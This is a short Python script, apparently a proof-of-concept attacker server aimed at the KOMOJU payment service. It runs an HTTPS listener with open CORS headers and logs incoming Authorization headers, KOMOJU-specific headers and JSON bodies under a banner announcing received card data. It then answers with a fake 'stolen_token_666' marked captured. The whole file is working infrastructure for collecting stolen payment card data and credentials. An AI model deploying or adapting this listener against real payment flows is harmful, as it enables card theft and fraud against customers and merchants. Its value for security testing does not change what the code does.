#!/usr/bin/env python3 import http.server, ssl, json, datetime, sys class Handler(http.server.BaseHTTPRequestHandler): def do_OPTIONS(self): self.send_response(200) for h,v in [('Access-Control-Allow-Origin','*'), ('Access-Control-Allow-Methods','POST,GET,OPTIONS'), ('Access-Control-Allow-Headers','Content-Type,Authorization,komoju-via,X-Komoju-API-Version')]: self.send_header(h,v) self.end_headers() def do_GET(self): self.send_response(200) self.send_header('Content-Type','application/json') self.send_header('Access-Control-Allow-Origin','*') self.end_headers() self.wfile.write(b'{"attacker":"ready"}') def do_POST(self): length = int(self.headers.get('Content-Length',0)) body = self.rfile.read(length) ts = datetime.datetime.now().strftime('%H:%M:%S') print(f"\n{'='*70}", flush=True) print(f"[{ts}] *** DATOS DE TARJETA RECIBIDOS ***", flush=True) print(f" PATH : {self.path}", flush=True) print(f" Auth : {self.headers.get('Authorization','')}", flush=True) print(f" Via : {self.headers.get('komoju-via','')}", flush=True) try: parsed = json.loads(body) print(f" PAYLOAD JSON:", flush=True) print(f" {json.dumps(parsed, indent=4)}", flush=True) except: print(f" BODY RAW: {body[:500]}", flush=True) print(f"{'='*70}", flush=True) self.send_response(200) self.send_header('Content-Type','application/json') self.send_header('Access-Control-Allow-Origin','*') self.end_headers() self.wfile.write(b'{"id":"stolen_token_666","status":"captured"}') def log_message(self,*a): pass ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) ctx.load_cert_chain('/tmp/cert.pem', '/tmp/key.pem') srv = http.server.HTTPServer(('0.0.0.0', 8443), Handler) srv.socket = ctx.wrap_socket(srv.socket, server_side=True) print("[ATTACKER HTTPS] Listening on 0.0.0.0:8443", flush=True) srv.serve_forever()